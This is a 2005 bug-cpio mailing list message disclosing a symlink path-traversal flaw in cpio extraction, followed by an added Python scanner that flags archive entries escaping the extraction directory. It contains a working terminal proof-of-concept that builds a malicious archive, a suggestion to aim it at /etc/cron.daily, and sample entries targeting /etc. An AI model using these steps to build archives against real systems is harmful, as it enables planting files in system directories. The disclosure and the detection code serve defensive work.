bug-cpio

From: t takahashi
Subject: [Bug-cpio] Fwd: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)
Date: Fri, 6 May 2005 17:52:29 -0700

Part 2.

---------- Forwarded message ----------
From: t takahashi <address@hidden>
Date: Apr 27, 2005 7:54 PM
Subject: Re: Bug#306693: cpio: allows extracting insecure pathnames
(leading slash = / and dotdot = ..)
To: address@hidden, address@hidden
Cc: address@hidden


P.P.S.  I found a more subtle security hole.  It is even more dangerous.

/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
1 block

Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname.  You have to use cpio -vt.  Now watch this:

/tmp/aaa$ cpio -i<dangerous
1 block
/tmp/aaa$ ls
b  dangerous
/tmp/aaa$ ls ../b
trojan

IMHO cpio should disallow this by default.  Imagine
../../../../../../../etc/cron.daily again.  cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.

Wow!
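
The message makes two points a defender can act on: `cpio -t` hides the symlink target (so grepping its output for `..` misses the escape), and an extractor should refuse to create entries whose real location is not below the extraction directory even when that happens indirectly through a symlink. The following is an added example, not cpio's own code: it parses a constructed listing in the shape of `cpio -vt` output (the first two lines mirror the ones above; the others are made up), tracks symlinks the archive itself defines, and reports every entry that would land outside the extraction directory. `within_dest` is a hypothetical pre-creation check against the real filesystem; the path `/tmp/extract-here` used in its docstring is an assumed destination.

```python
"""Added example (not cpio's code): flag archive entries that would land
outside the extraction directory, including the indirect symlink case."""
import os
import posixpath
import re

# Constructed listing in the shape of `cpio -vt` output. The first two lines
# mirror the message above; the remaining entries are made up for contrast.
SAMPLE_LISTING = """\
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
drwxr-xr-x   2 kpc      kpc             0 Apr 27 19:46 safe
-rw-r--r--   1 kpc      kpc            12 Apr 27 19:46 safe/readme.txt
lrwxrwxrwx   1 kpc      kpc             9 Apr 27 19:46 safe/link -> readme.txt
-rw-r--r--   1 kpc      kpc             0 Apr 27 19:46 ../../etc/cron.daily/x
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 abs -> /etc
-rw-r--r--   1 kpc      kpc             0 Apr 27 19:46 abs/passwd
"""

# mode, links, owner, group, size, month, day, time-or-year, then the name
# (followed by " -> target" for symlinks).
LINE_RE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+[\d:]+\s+(?P<rest>.*)$"
)


def escapes(path):
    """True if an archive-relative path points above or outside the root."""
    return path.startswith("/") or path == ".." or path.startswith("../")


def resolve_in_archive(path, symlinks, max_hops=32):
    """Rewrite `path` through symlinks the archive itself defines, leftmost
    component first, the way the kernel will when cpio later creates the
    entry. Returns the path as seen from the extraction directory."""
    cur = posixpath.normpath(path)
    for _ in range(max_hops):  # bounded so a link cycle cannot loop forever
        parts = cur.split("/")
        for i in range(1, len(parts) + 1):
            prefix = "/".join(parts[:i])
            if prefix in symlinks:
                cur = posixpath.normpath(posixpath.join(symlinks[prefix], *parts[i:]))
                break
        else:
            return cur
    return cur


def scan_listing(text):
    """Return (name, resolved, reason) for every entry that would be created
    outside the extraction directory, directly or through a symlink."""
    symlinks = {}
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        target = None
        if m.group("mode")[0] == "l" and " -> " in rest:
            rest, target = rest.split(" -> ", 1)
        name = posixpath.normpath(rest)
        landing = resolve_in_archive(name, symlinks)
        if escapes(landing):
            findings.append((name, landing, "entry lands outside extraction dir"))
        if target is not None:
            # Where the link points, taken relative to the link's own directory.
            dest = posixpath.join(posixpath.dirname(name), target)
            dest = resolve_in_archive(dest, symlinks)
            symlinks[name] = dest
            if escapes(dest):
                findings.append((name, dest, "symlink target outside extraction dir"))
    return findings


def within_dest(dest_dir, entry_path):
    """Hypothetical pre-creation check on the real filesystem: resolve the
    entry's parent directory (following symlinks already on disk, e.g. the
    `b` created a moment earlier) and require it to stay under dest_dir.
    Example: within_dest("/tmp/extract-here", "../b/trojan") is False."""
    root = os.path.realpath(dest_dir)
    parent = os.path.realpath(os.path.join(root, os.path.dirname(entry_path)))
    return parent == root or parent.startswith(root + os.sep)


if __name__ == "__main__":
    for name, resolved, reason in scan_listing(SAMPLE_LISTING):
        print(f"{name!r} -> {resolved!r}: {reason}")
```

Run against the sample listing this reports `b`, `b/trojan`, `../../etc/cron.daily/x`, `abs` and `abs/passwd`; a scan of the `-t` names alone would only have caught the entry with a literal `..`. The listing scan is advisory: the enforcing check belongs in the extractor immediately before each entry is created, otherwise a link placed between the scan and the write defeats it.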
